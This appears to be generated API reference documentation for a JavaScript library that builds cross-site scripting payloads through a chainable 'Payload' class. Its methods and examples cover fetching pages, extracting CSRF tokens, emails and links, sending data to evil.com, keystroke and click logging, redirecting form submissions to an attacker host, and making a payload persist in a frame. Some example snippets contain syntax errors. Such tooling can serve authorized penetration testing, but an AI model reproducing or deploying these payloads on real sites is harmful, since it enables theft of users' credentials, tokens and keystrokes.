Payload

Payload

A payload object

Members

Methods

Constructor

Payload.js:11

new Payload(parentopt, renderopt)

Used internally
Use Payload.new() instead.

Parameters
Name Type Attributes Default Description
parent Payload <optional>
 null

Parent payload
render function <optional>
 null

Render function for the payload

Methods

Payload.js:30

(static) new() → {Payload}

Return a new Payload object.

Returns
Type
Payload
Payload.js:254

addExfiltrator(exfiltrator) → {Payload}

Add an exfiltrator to use when exfiltrate is called.

Example
const p new Payload()
            .addExfiltrator(x => fetch('https://evil.com/?' + x))
            .addExfiltrator(exfiltrators.message())
            .eval(x=>42)
            .exfiltrate()

eval(p.run())
Parameters
Name Type Description
exfiltrator function | Payload

exfiltrator to use. exfiltrator is a function that take the data to exfiltrate and do something with it.
Returns

The new payload object in the chain.

Type
Payload
Payload.js:445

asDOM(langopt) → {Payload}

Take the pipe value, parse it as html or xml and set the result as the pipe value.

Example
const p = Payload.new()
              .fetchText("/")
              .asDOM()
              .querySelector("title", "innerText")
              .exfiltrate()

eval(p.run())
Parameters
Name Type Attributes Default Description
lang string <optional>
 "text/html"

Language to use for the parser,
Returns

The new payload object in the chain.

Type
Payload
Payload.js:63

eval(code_or_func, …args) → {Payload}

This add a function to eval to the payload, the function take the value in the pipe as an argument named _ the value returned by the function is then passed in the pipe

Example
const p = Payload.new()
              .eval(()=>42)      # pipe value set to 42
              .eval(x=>alert(x))  # alert 42

eval(p.run())
Parameters
Name Type Attributes Description
code_or_func string | function | Payload

to eval on the target, if code_or_func is a function, then is converted to string.
args any <repeatable>

arguments to bind to the function
Returns

The new payload object in the chain.

Type
Payload
Payload.js:270

exfiltrate() → {Payload}

Exfiltrate the current pipe value.

Example
const p new Payload()
            .addExfiltrator(exfiltrators.message())
            .eval(x=>42)
            .exfiltrate()

eval(p.run())
Returns

The new payload object in the chain.

Type
Payload
Payload.js:331

fetch(url_or_func, optionsopt) → {Payload}

Fetch the supplied url, the response is then passed in the pipe.

Most of the time fetchText, fetchDOM, fetchJSON are what yout need

Examples
const p new Payload()
            .fetch("/")
            .eval(r=>r.status)
            .exfiltrate()

eval(p.run())
const p new Payload()
              eval(()=> {
                return [window.API_URL, {headers: {"X-CSRF-TOKEN": window.TOKEN}}]
              })
            .fetch()
            .eval(r=>r.status)
            .exfiltrate()

eval(p.run())
Parameters
Name Type Attributes Default Description
url_or_func string | function | Payload

URL to fetch or function that return either an url or an array of [url, options] to pass to fetch .
options object <optional>
 {}

Options passed to fetch (ignored if url_or_func is a function).
Returns

The new payload object in the chain.

Type
Payload
Payload.js:396

fetchDOM(url_or_func, optionsopt) → {Payload}

Fetch the supplied url, the response text is parsed as html and passed in the pipe.

Examples
const p = Payload.new()
              .fetchDOM("/")
              .querySelector("title", "innerText")
              .exfiltrate()

eval(p.run())
const p = Payload.new()
              .eval(()=> {
                  return [window.API_URL, {headers: {"X-CSRF-TOKEN": window.TOKEN}}]
                })
              .fetchDOM()
              .querySelector("title", "innerText")
              .exfiltrate()

eval(p.run())
Parameters
Name Type Attributes Default Description
url_or_func string | function | Payload

URL to fetch or function that return either an url or an array of [url, options] to pass to fetch .
options object <optional>
 {}

Options passed to fetch (ignored if url_or_func is a function).
Returns

The new payload object in the chain.

Type
Payload
Payload.js:425

fetchJSON(url_or_func, optionsopt) → {Payload}

Fetch the supplied url, the response text is parsed as json and passed in the pipe.

Examples
const p = Payload.new()
              .fetchJSON("/")           # return a json object
              .eval(obj => obj.msg)
              .exfiltrate()

eval(p.run())
const p = Payload.new()
              .eval(()=> {
                  return [window.API_URL, {headers: {"X-CSRF-TOKEN": window.TOKEN}}]
                })
              .fetchJSON()
              .eval(obj => obj.msg)
              .exfiltrate()

eval(p.run())
Parameters
Name Type Attributes Default Description
url_or_func function | Payload | string

URL to fetch or function that return either an url or an array of [url, options] to pass to fetch .
options object <optional>
 {}

Options passed to fetch (ignored if url_or_func is a function).
Returns

The new payload object in the chain.

Type
Payload
Payload.js:367

fetchText(url_or_func, optionsopt) → {Payload}

Fetch the supplied url, the response text is then passed in the pipe.

Examples
const p new = Payload()
              .fetchText("/")
              .exfiltrate()

eval(p.run())
const p new = Payload()
              .eval(()=> {
                  return [window.API_URL, {headers: {"X-CSRF-TOKEN": window.TOKEN}}]
                })
              .fetchText()
              .exfiltrate()

eval(p.run())
Parameters
Name Type Attributes Default Description
url_or_func string | function | Payload

URL to fetch or function that return either an url or an array of [url, options] to pass to fetch .
options object <optional>
 {}

Options passed to fetch (ignored if url_or_func is a function).
Returns

The new payload object in the chain.

Type
Payload
Payload.js:582

findBetween(before, after) → {Payload}

Take the pipe value as a string an search for a string present between to needle, the match is return in the pipe

Example
const p = Payload.new()
              .fetchText("/")
              .findBetween('<title>', '</title>')
              .exfiltrate()

eval(p.run())
Parameters
Name Type Description
before string

String present before the targeted text
after string

String present after the targeted text
Returns

The new payload object in the chain.

Type
Payload
Payload.js:183

forEach(payload) → {Payload}

Take an array from the pipe an call the payload for each element, all calls are made simultaneously.

Each payload take an element from the array as an argument

Example
const p = Payload.new()
              .fetchDOM("/")
              .querySelectorAll("a", "href")
              .forEach(
                   Payload.new().fetchText()
                )
              .exfiltrate()

eval(p.run())
Parameters
Name Type Description
payload Payload | function

to run for each elements of the pipe value,
Returns

The new payload object in the chain.

Type
Payload
Payload.js:205

guard() → {Payload}

Ensure that the payload will only be run once, usefull when the vulnerable parameter is reflected multiple time.

Example
const p = Payload.new()
              .guard()
              .eval(x => alert(x))

eval(p.run()) # call alert()
eval(p.run()) # raise Guard error
Returns

The new payload object in the chain.

Type
Payload
Payload.js:679

injectStyle(style_or_funcopt) → {Payload}

Read the pipe value as css and inject a style element on the page.

The pipe value is not modified.

Examples
const p = Payload.new()
              .eval(() => 'body{background:red}')
              .injectStyle()

return eval(p.run())
const p = Payload.new()
              .injectStyle('body{background:red}')

return eval(p.run())
const p = Payload.new()
              .eval(() => 'red')
              .injectStyle(color => `body{background:${color}}`)

return eval(p.run())
Parameters
Name Type Attributes Default Description
style_or_func string | function | Payload <optional>
 null

If style_or_func is a string, then value will be used instead of the pipe value.
If style_or_func is a function, then return value will be used instead of the pipe value.
Returns

The new payload object in the chain.

Type
Payload
Payload.js:852

log() → {Payload}

Log the pipe value in the console, used for debugging purpose

The pipe value is not modified.

Example
const p = Payload.new()
              .fetchDOM("/")
              .log()
              .querySelector("title", "innerText")
              .log()
              .exfiltrate()

eval(p.run())
Returns

The new payload object in the chain.

Type
Payload
Payload.js:158

map(payload) → {Payload}

Take an array from the pipe an call the payload for each element, all calls are made simultaneously.

Each payload take an element from the array as an argument

Example
const p = Payload.new()
              .fetchDOM("/")
              .querySelectorAll("a", "href")
              .map(
                  Payload.new().fetchText()
                )
              .exfiltrate()

eval(p.run())
Parameters
Name Type Description
payload Payload | function

to run for each elements of the pipe value,
Returns

The new payload object in the chain.

Type
Payload
Payload.js:132

parallel(…payloads) → {Payload}

This add multiple payload to eval simultaneously with the current pipe value.

Example
const p = Payload.new()
              .parallel(
                  Payload.new().fetchDOM("/"),
                  Payload.new().fetchDOM("/api")
              .exfiltrate()

eval(p.run())
Parameters
Name Type Attributes Description
payloads Payload | function <repeatable>

Payloads to run simultaneously,
Returns

The new payload object in the chain.

Type
Payload
Payload.js:94

passthru(code_or_func, …args) → {Payload}

This add a function to eval to the payload, the function take the value in the pipe as an argument named _ the value return by the function is ignored, the previous value on pipe is keeped.

Example
const p = Payload.new()
              .eval(()=>42)                 # pipe value set to 42
              .passthru(v=>console.log(v))  # log the value of the pipe
              .exfiltrate()                 # 42

eval(p.run())
Parameters
Name Type Attributes Description
code_or_func string | function | Payload

to eval on the target, if code_or_func is a function, then is converted to string.
args any <repeatable>

arguments to bind to the function
Returns

The new payload object in the chain.

Type
Payload
Payload.js:764

persist(callbackopt) → {Payload}

Try to make the payload persistant by wrapping the content in a frame.

Example
const p = Payload.new()
              .persist(
                Payload.new().eval(d=>d.location).exfiltrate()
              )

return eval(p.run())
Parameters
Name Type Attributes Default Description
callback function | Payload <optional>
 null

called each time the frame load, with the current document
Returns

The new payload object in the chain.

Type
Payload
Payload.js:832

postMessage(nameopt, targetopt) → {Payload}

Read the pipe value and send it to a frame using postMessage

The pipe value is not modified.

Parameters
Name Type Attributes Default Description
name string <optional>
 "top"

Name of the targeted frame
target string <optional>
 "*"

Target for the message
Returns

The new payload object in the chain.

Type
Payload
Payload.js:707

postMultipart(callback)

Parameters
Name Type Description
callback *
Payload.js:471

querySelector(selector_or_func, attropt) → {Payload}

Take the pipe value and search for the first element matching the selector, the element is then set as the pipe value. If attr is passed to the function, only the corresponding attribute is passed in the pipe

Examples
const p = Payload.new()                                       # by default the pipe value is set to window.document
              .querySelector('title')                       # get the title element
              .passthru(el => el.innerText = 'New title')   # change the title

eval(p.run())
const p = Payload.new()
              .fetchDOM("/user/me")
              .querySelector('input[name=email]', 'value')
              .exfiltrate()

eval(p.run())
Parameters
Name Type Attributes Default Description
selector_or_func string

CSS selector,
attr string <optional>
 null

Attribute
Returns

The new payload object in the chain.

Type
Payload
Payload.js:515

querySelectorAll(selector_or_func, attropt) → {Payload}

Take the pipe value and search for all elements matching the selector, an array of elements is then set as the pipe value. If attr is passed to the function, only the corresponding attribute is passed in the pipe

Examples
const p = Payload.new()                                       # by default the pipe value is set to window.document
              .querySelectorAll('form')                     # get all the forms
              .passthru(els => {
                  els.forEach(el => el.action = '//evil.com') # change the form destination
                })

eval(p.run())
const p = Payload.new()
              .fetchDOM("/")
              .querySelectorAll('a', 'href')     # Get all the link present on the page
              .exfiltrate()

eval(p.run())
Parameters
Name Type Attributes Default Description
selector_or_func string

CSS selector,
attr string <optional>
 null

Attribute
Returns

The new payload object in the chain.

Type
Payload
Payload.js:861

redirect(url) → {Payload}

Redirect the user to a new url

Parameters
Name Type Description
url *
Returns

The new payload object in the chain.

Type
Payload
Payload.js:551

regExtract(reg_or_func, flagsopt) → {Payload}

Take the pipe value as a string an perform a regex search on it, the first matched group is return in the pipe

Example
const p = Payload.new()
              .fetchText("/")
              .regExtract('token=([a-f0-9]+)')
              .exfiltrate()

eval(p.run())
Parameters
Name Type Attributes Default Description
reg_or_func string

Regex
flags string <optional>
 ""

Flags for the regex [gimsuy]
Returns

The new payload object in the chain.

Type
Payload
Payload.js:236

setExfiltrator(exfiltrator) → {Payload}

Set the exfiltrator to use when exfiltrate is called.

Examples
const p new Payload()
            .setExfiltrator(x => fetch('https://evil.com/?' + x))
            .eval(x=>42)
            .exfiltrate()

eval(p.run())
const p new Payload()
            .setExfiltrator(exfiltrators.message())
            .eval(x=>42)
            .exfiltrate()

eval(p.run())
Parameters
Name Type Description
exfiltrator Payload | function

exfiltrator to use. exfiltrator is a function that take the data to exfiltrate and do something with it.
Returns

The new payload object in the chain.

Type
Payload
Payload.js:642

startClickLogger(fopt) → {Payload}

Start a click logger, each click position and targeted element will be exfiltrated via the exfiltrators.

The pipe value is not modified.

Examples
const p = Payload.new()
              .setExfiltrator(exfiltrator.get('//evil.com'))
              .startClickLogger()

eval(p.run())
const p = Payload.new()
              .setExfiltrator(ev => console.log(ev.target))
              .startClickLogger()

eval(p.run())
Parameters
Name Type Attributes Default Description
f function <optional>
 null

User defined function to call instead of exfiltrating
Returns

The new payload object in the chain.

Type
Payload
Payload.js:614

startKeyLogger(fopt) → {Payload}

Start a key logger, each keystroke will be exfiltrated via the exfiltrators.

The pipe value is not modified.

Examples
const p = Payload.new()
              .setExfiltrator(exfiltrator.get('//evil.com'))
              .startKeyLogger()

eval(p.run())
const p = Payload.new()
              .setExfiltrator(ev => console.log(ev.target))
              .startKeyLogger()

eval(p.run())
Parameters
Name Type Attributes Default Description
f function <optional>
 null

User defined function to call instead of exfiltrating
Returns

The new payload object in the chain.

Type
Payload
Payload.js:292

wait(ms) → {Payload}

Wait before contiuing the execution.

Example
const p new Payload()
            .fetch("/sendMail")      # Long operation that continue after the response
            .wait(4000)              # wait for 4s
            .fetchText("/readMail")
            .exfiltrate()

eval(p.run())
Parameters
Name Type Default Description
ms number | Payload | function null

Time to wait in ms.
Returns

The new payload object in the chain.

Type
Payload